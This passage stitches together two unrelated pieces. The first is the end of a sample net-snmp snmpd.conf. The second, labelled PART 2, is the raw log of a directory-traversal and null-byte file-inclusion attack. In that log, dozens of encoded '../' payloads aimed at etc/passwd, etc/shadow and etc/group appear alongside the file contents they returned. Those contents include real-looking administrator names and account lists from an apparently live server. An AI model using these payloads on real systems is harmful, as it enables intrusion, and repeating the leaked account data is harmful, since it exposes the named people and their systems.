  2420. # 15MAX: Similar, but for 15 min average.
  2421.  
  2422. # Check for loads:
  2423. #load 12 14 14
  2424.  
  2425. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.10
  2426. # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.1 = 1
  2427. # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.2 = 2
  2428. # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.3 = 3
  2429. # enterprises.ucdavis.loadTable.laEntry.loadaveNames.1 = "Load-1"
  2430. # enterprises.ucdavis.loadTable.laEntry.loadaveNames.2 = "Load-5"
  2431. # enterprises.ucdavis.loadTable.laEntry.loadaveNames.3 = "Load-15"
  2432. # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.1 = "0.49" Hex: 30 2E 34 39
  2433. # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.2 = "0.31" Hex: 30 2E 33 31
  2434. # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.3 = "0.26" Hex: 30 2E 32 36
  2435. # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.1 = "12.00"
  2436. # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.2 = "14.00"
  2437. # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.3 = "14.00"
  2438. # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.1 = 0
  2439. # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.2 = 0
  2440. # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.3 = 0
  2441. # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.1 = ""
  2442. # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.2 = ""
  2443. # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.3 = ""
  2444.  
  2445. # -----------------------------------------------------------------------------
  2446.  
  2447.  
  2448. ###############################################################################
  2449. # Extensible sections.
  2450. #
  2451.  
  2452. # This alleviates the multiple line output problem found in the
  2453. # previous executable mib by placing each mib in its own mib table:
  2454.  
  2455. # Run a shell script containing:
  2456. #
  2457. # #!/bin/sh
  2458. # echo hello world
  2459. # echo hi there
  2460. # exit 35
  2461. #
  2462. # Note: this has been specifically commented out to prevent
  2463. # accidental security holes due to someone else on your system writing
  2464. # a /tmp/shtest before you do. Uncomment to use it.
  2465. #
  2466. # exec .1.3.6.1.4.1.2021.50 shelltest /bin/sh /tmp/shtest
  2467.  
  2468. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.50
  2469. # enterprises.ucdavis.50.1.1 = 1
  2470. # enterprises.ucdavis.50.2.1 = "shelltest"
  2471. # enterprises.ucdavis.50.3.1 = "/bin/sh /tmp/shtest"
  2472. # enterprises.ucdavis.50.100.1 = 35
  2473. # enterprises.ucdavis.50.101.1 = "hello world."
  2474. # enterprises.ucdavis.50.101.2 = "hi there."
  2475. # enterprises.ucdavis.50.102.1 = 0
  2476.  
  2477. # Now the Output has grown to two lines, and we can see the 'hi
  2478. # there.' output as the second line from our shell script.
  2479. #
  2480. # Note that you must alter the mib.txt file to be correct if you want
  2481. # the .50.* outputs above to change to reasonable text descriptions.
  2482.  
  2483. # Other ideas:
  2484. #
  2485. # exec .1.3.6.1.4.1.2021.51 ps /bin/ps
  2486. # exec .1.3.6.1.4.1.2021.52 top /usr/local/bin/top
  2487. # exec .1.3.6.1.4.1.2021.53 mailq /usr/bin/mailq
  2488.  
  2489. # -----------------------------------------------------------------------------
  2490.  
  2491.  
  2492. ###############################################################################
  2493. # Pass through control.
  2494. #
  2495.  
  2496. # Usage:
  2497. # pass MIBOID EXEC-COMMAND
  2498. #
  2499. # This will pass total control of the mib underneath the MIBOID
  2500. # portion of the mib to the EXEC-COMMAND.
  2501. #
  2502. # Note: You'll have to change the path of the passtest script to your
  2503. # source directory or install it in the given location.
  2504. #
  2505. # Example: (see the script for details)
  2506. # (commented out here since it requires that you place the
  2507. # script in the right location. (its not installed by default))
  2508.  
  2509. # pass .1.3.6.1.4.1.2021.255 /bin/sh /usr/local/local/passtest
  2510.  
  2511. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.255
  2512. # enterprises.ucdavis.255.1 = "life the universe and everything"
  2513. # enterprises.ucdavis.255.2.1 = 42
  2514. # enterprises.ucdavis.255.2.2 = OID: 42.42.42
  2515. # enterprises.ucdavis.255.3 = Timeticks: (363136200) 42 days, 0:42:42
  2516. # enterprises.ucdavis.255.4 = IpAddress: 127.0.0.1
  2517. # enterprises.ucdavis.255.5 = 42
  2518. # enterprises.ucdavis.255.6 = Gauge: 42
  2519. #
  2520. # % snmpget -v 1 localhost public .1.3.6.1.4.1.2021.255.5
  2521. # enterprises.ucdavis.255.5 = 42
  2522. #
  2523. # % snmpset -v 1 localhost public .1.3.6.1.4.1.2021.255.1 s "New string"
  2524. # enterprises.ucdavis.255.1 = "New string"
  2525. #
  2526.  
  2527. # For specific usage information, see the man/snmpd.conf.5 manual page
  2528. # as well as the local/passtest script used in the above example.
  2529.  
  2530. ###############################################################################
  2531.  
  2532. PART 2
  2533.  
  2534.  
  2535. <b>Query Used: %00</b><b>Query Used: etc/hosts%00</b>127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
  2536. ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
  2537. <b>Query Used: etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
  2538. bin:x:1:1:bin:/bin:/sbin/nologin
  2539. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2540. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2541. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2542. sync:x:5:0:sync:/sbin:/bin/sync
  2543. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2544. halt:x:7:0:halt:/sbin:/sbin/halt
  2545. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2546. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2547. operator:x:11:0:operator:/root:/sbin/nologin
  2548. games:x:12:100:games:/usr/games:/sbin/nologin
  2549. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2550. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2551. nobody:x:99:99:Nobody:/:/sbin/nologin
  2552. dbus:x:81:81:System message bus:/:/sbin/nologin
  2553. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2554. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2555. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2556. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2557. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2558. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2559. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2560. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2561. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2562. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2563. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2564. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2565. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2566. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2567. tcpdump:x:72:72::/:/sbin/nologin
  2568. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  2569. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  2570. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  2571. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2572. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2573. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2574. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2575. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2576. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2577. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2578. memcached:x:302:302:Memcached daemon:/var/run/memcached:/sbin/nologin
  2579. <b>Query Used: ..\%20\..\%20\..\%20\etc/passwd%00</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\passwd%00</b>.<b>Query Used: ../../../../../../../../../../etc/passwd%00</b>.<b>Query Used: ../../../../../../../../../../etc/hosts%00</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\group%00</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/passwd%00</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/shadow%00</b>.<b>Query Used: /%00</b><b>Query Used: %00/%00</b><b>Query Used: /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00</b>.<b>Query Used: %2A%00</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
  2580. bin:x:1:1:bin:/bin:/sbin/nologin
  2581. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2582. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2583. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2584. sync:x:5:0:sync:/sbin:/bin/sync
  2585. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2586. halt:x:7:0:halt:/sbin:/sbin/halt
  2587. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2588. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2589. operator:x:11:0:operator:/root:/sbin/nologin
  2590. games:x:12:100:games:/usr/games:/sbin/nologin
  2591. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2592. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2593. nobody:x:99:99:Nobody:/:/sbin/nologin
  2594. dbus:x:81:81:System message bus:/:/sbin/nologin
  2595. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2596. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2597. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2598. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2599. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2600. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2601. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2602. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2603. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2604. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2605. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2606. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2607. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2608. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2609. tcpdump:x:72:72::/:/sbin/nologin
  2610. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  2611. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  2612. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  2613. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2614. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2615. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2616. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2617. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2618. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2619. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  2620. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  2621. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  2622. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2623. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  2624. <b>Query Used: /////etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
  2625. bin:x:1:1:bin:/bin:/sbin/nologin
  2626. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2627. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2628. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2629. sync:x:5:0:sync:/sbin:/bin/sync
  2630. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2631. halt:x:7:0:halt:/sbin:/sbin/halt
  2632. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2633. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2634. operator:x:11:0:operator:/root:/sbin/nologin
  2635. games:x:12:100:games:/usr/games:/sbin/nologin
  2636. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2637. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2638. nobody:x:99:99:Nobody:/:/sbin/nologin
  2639. dbus:x:81:81:System message bus:/:/sbin/nologin
  2640. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2641. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2642. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2643. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2644. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2645. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2646. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2647. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2648. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2649. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2650. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2651. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2652. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2653. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2654. tcpdump:x:72:72::/:/sbin/nologin
  2655. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  2656. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  2657. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  2658. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2659. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2660. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2661. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2662. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2663. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2664. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  2665. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2666. memcached:x:302:302:Memcached daemon:/var/run/memcached:/sbin/nologin
  2667. <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00</b>root:x:0:root
  2668. bin:x:1:root,bin,daemon
  2669. daemon:x:2:root,bin,daemon
  2670. sys:x:3:root,bin,adm
  2671. adm:x:4:root,adm,daemon
  2672. tty:x:5:
  2673. disk:x:6:root
  2674. lp:x:7:daemon,lp
  2675. mem:x:8:
  2676. kmem:x:9:
  2677. wheel:x:10:root
  2678. mail:x:12:mail,postfix
  2679. uucp:x:14:uucp
  2680. man:x:15:
  2681. games:x:20:
  2682. gopher:x:30:
  2683. video:x:39:
  2684. dip:x:40:
  2685. ftp:x:50:
  2686. lock:x:54:
  2687. audio:x:63:
  2688. nobody:x:99:
  2689. users:x:100:
  2690. dbus:x:81:
  2691. utmp:x:22:
  2692. utempter:x:35:
  2693. floppy:x:19:
  2694. vcsa:x:69:
  2695. rpc:x:32:
  2696. abrt:x:499:
  2697. cdrom:x:11:
  2698. tape:x:33:
  2699. dialout:x:18:
  2700. saslauth:x:498:
  2701. mailnull:x:47:
  2702. smmsp:x:51:
  2703. haldaemon:x:68:haldaemon
  2704. ntp:x:38:
  2705. rpcuser:x:29:
  2706. nfsnobody:x:65534:
  2707. apache:x:48:
  2708. webalizer:x:67:
  2709. sshd:x:74:
  2710. postdrop:x:90:
  2711. postfix:x:89:
  2712. tcpdump:x:72:
  2713. slocate:x:21:
  2714. stapdev:x:497:
  2715. stapusr:x:496:
  2716. sysadmin:x:401:cmccan,darnold,kmars,mstrydom,nscanner
  2717. cmccan:x:500:
  2718. darnold:x:501:
  2719. kmars:x:503:
  2720. mstrydom:x:533:
  2721. zabbix:x:309:
  2722. clamav:x:311:
  2723. clamupdate:x:312:
  2724. clam:x:308:
  2725. cgred:x:307:
  2726. ahps:x:303:
  2727. nwschat:x:320:
  2728. forecast:x:302:
  2729. ndfd:x:306:
  2730. nscanner:x:424:
  2731. memcached:x:301:
  2732. stapsys:x:157:
  2733. <b>Query Used: ///////etc//passwd%00</b>root:x:0:0:root:/root:/bin/bash
  2734. bin:x:1:1:bin:/bin:/sbin/nologin
  2735. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2736. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2737. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2738. sync:x:5:0:sync:/sbin:/bin/sync
  2739. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2740. halt:x:7:0:halt:/sbin:/sbin/halt
  2741. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2742. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2743. operator:x:11:0:operator:/root:/sbin/nologin
  2744. games:x:12:100:games:/usr/games:/sbin/nologin
  2745. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2746. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2747. nobody:x:99:99:Nobody:/:/sbin/nologin
  2748. dbus:x:81:81:System message bus:/:/sbin/nologin
  2749. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2750. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2751. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2752. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2753. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2754. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2755. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2756. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2757. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2758. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2759. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2760. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2761. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2762. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2763. tcpdump:x:72:72::/:/sbin/nologin
  2764. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  2765. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  2766. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  2767. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2768. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2769. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2770. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2771. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2772. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2773. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  2774. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  2775. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  2776. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2777. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  2778. <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
  2779. bin:x:1:1:bin:/bin:/sbin/nologin
  2780. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2781. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2782. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2783. sync:x:5:0:sync:/sbin:/bin/sync
  2784. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2785. halt:x:7:0:halt:/sbin:/sbin/halt
  2786. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2787. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2788. operator:x:11:0:operator:/root:/sbin/nologin
  2789. games:x:12:100:games:/usr/games:/sbin/nologin
  2790. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2791. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2792. nobody:x:99:99:Nobody:/:/sbin/nologin
  2793. dbus:x:81:81:System message bus:/:/sbin/nologin
  2794. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2795. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2796. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2797. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2798. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2799. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2800. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2801. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2802. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2803. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2804. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2805. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2806. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2807. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2808. tcpdump:x:72:72::/:/sbin/nologin
  2809. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  2810. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  2811. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  2812. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2813. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2814. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2815. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2816. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2817. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2818. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  2819. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  2820. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  2821. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2822. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  2823. <b>Query Used: ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00</b>root:x:0:0:root:/root:/bin/bash
  2824. bin:x:1:1:bin:/bin:/sbin/nologin
  2825. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2826. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2827. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2828. sync:x:5:0:sync:/sbin:/bin/sync
  2829. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2830. halt:x:7:0:halt:/sbin:/sbin/halt
  2831. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2832. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2833. operator:x:11:0:operator:/root:/sbin/nologin
  2834. games:x:12:100:games:/usr/games:/sbin/nologin
  2835. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2836. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2837. nobody:x:99:99:Nobody:/:/sbin/nologin
  2838. dbus:x:81:81:System message bus:/:/sbin/nologin
  2839. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2840. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2841. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2842. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2843. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2844. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2845. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2846. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2847. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2848. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2849. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2850. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2851. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  2852. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  2853. tcpdump:x:72:72::/:/sbin/nologin
  2854. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  2855. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  2856. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  2857. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  2858. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  2859. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  2860. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  2861. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  2862. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  2863. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  2864. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  2865. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  2866. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  2867. <b>Query Used: /&apos;%00</b>.<b>Query Used: /\,%ENV\,/%00</b>.<b>Query Used: /etc/passwd%00</b>.<b>Query Used: /etc/passwd%00</b>.<b>Query Used: /.....%0a%00</b>.<b>Query Used: /%2A%00</b>.<b>Query Used: /etc/passwd%00</b>root:x:0:0:root:/root:/bin/bash
  2868. bin:x:1:1:bin:/bin:/sbin/nologin
  2869. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  2870. adm:x:3:4:adm:/var/adm:/sbin/nologin
  2871. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  2872. sync:x:5:0:sync:/sbin:/bin/sync
  2873. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  2874. halt:x:7:0:halt:/sbin:/sbin/halt
  2875. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  2876. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  2877. operator:x:11:0:operator:/root:/sbin/nologin
  2878. games:x:12:100:games:/usr/games:/sbin/nologin
  2879. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  2880. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  2881. nobody:x:99:99:Nobody:/:/sbin/nologin
  2882. dbus:x:81:81:System message bus:/:/sbin/nologin
  2883. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  2884. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  2885. abrt:x:499:499::/etc/abrt:/sbin/nologin
  2886. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  2887. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  2888. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  2889. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  2890. ntp:x:38:38::/etc/ntp:/sbin/nologin
  2891. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  2892. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  2893. apache:x:48:48:Apache:/var/www:/sbin/nologin
  2894. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  2895. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
